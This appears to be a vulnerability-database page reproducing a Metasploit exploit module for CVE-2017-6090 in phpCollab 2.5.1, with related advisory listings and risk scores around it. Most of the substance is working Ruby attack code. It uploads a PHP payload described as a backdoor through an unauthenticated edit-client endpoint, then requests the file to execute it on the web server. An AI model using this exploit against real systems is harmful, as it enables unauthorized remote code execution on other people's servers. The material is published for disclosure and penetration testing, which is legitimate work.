Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpCollab 2.5.1 - File Upload (Metasploit)

🗓️ 11 Jan 2018 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 85 Views

phpCollab 2.5.1 Unauthenticated File Upload vulnerability allows arbitrary code execution

Related
Code
ReporterTitlePublishedViews
Family
0day.today		PhpCollab 2.5.1 Shell Upload Exploit
30 Sep 201700:00
zdt
0day.today		phpCollab 2.5.1 - Unauthenticated File Upload Exploit
11 Jan 201800:00
zdt
Circl		CVE-2017-6090
2 Oct 201700:00
circl
CNVD		PhpCollab Arbitrary Code Execution Vulnerability
21 May 201800:00
cnvd
CVE		CVE-2017-6090
2 Oct 201717:00
cve
Cvelist		CVE-2017-6090
2 Oct 201717:00
cvelist
Exploit DB		phpCollab 2.5.1 - Arbitrary File Upload
2 Oct 201700:00
exploitdb
exploitpack		phpCollab 2.5.1 - Arbitrary File Upload
2 Oct 201700:00
exploitpack
Metasploit		phpCollab 2.5.1 Unauthenticated File Upload
20 Dec 201713:36
metasploit
Nuclei		PhpColl 2.5.1 Arbitrary File Upload
3 Jun 202606:04
nuclei
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload',
      'Description'    => %q{
          This module exploits a file upload vulnerability in phpCollab 2.5.1
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the web server user.

        The exploit has been tested on Ubuntu 16.04.3 64-bit
      },
      'Author'         =>
        [
          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-6090' ],
          [ 'EDB', '42934' ],
          [ 'URL', 'http://www.phpcollab.com/' ],
          [ 'URL', 'https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 29 2017'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
        ])
  end

  def check
    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
    res = send_request_cgi(
        'method'  => 'GET',
        'uri'     =>  url
    )

    version = res.body.scan(/PhpCollab v([\d\.]+)/).flatten.first
    vprint_status("Found version: #{version}")

    unless version
      vprint_status('Unable to get the PhpCollab version.')
      return CheckCode::Unknown
    end

    if Gem::Version.new(version) >= Gem::Version.new('0')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
    id = File.basename(filename,File.extname(filename))
    register_file_for_cleanup(filename)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")

    print_status("Uploading backdoor file: #{filename}")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'clients/editclient.php'),
      'vars_get' => {
        'id'     => id,
        'action' => 'update'
      },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })

    if res && res.code == 302
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    print_status("Triggering the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "logos_clients/" + filename)
     }, 5)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Jan 2018 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.5
CVSS 38.8
EPSS0.86913
phpcollabunauthenticatedfile uploadvulnerabilityarbitrary code executionmetasploitexploitremotehttp clientfile dropper
85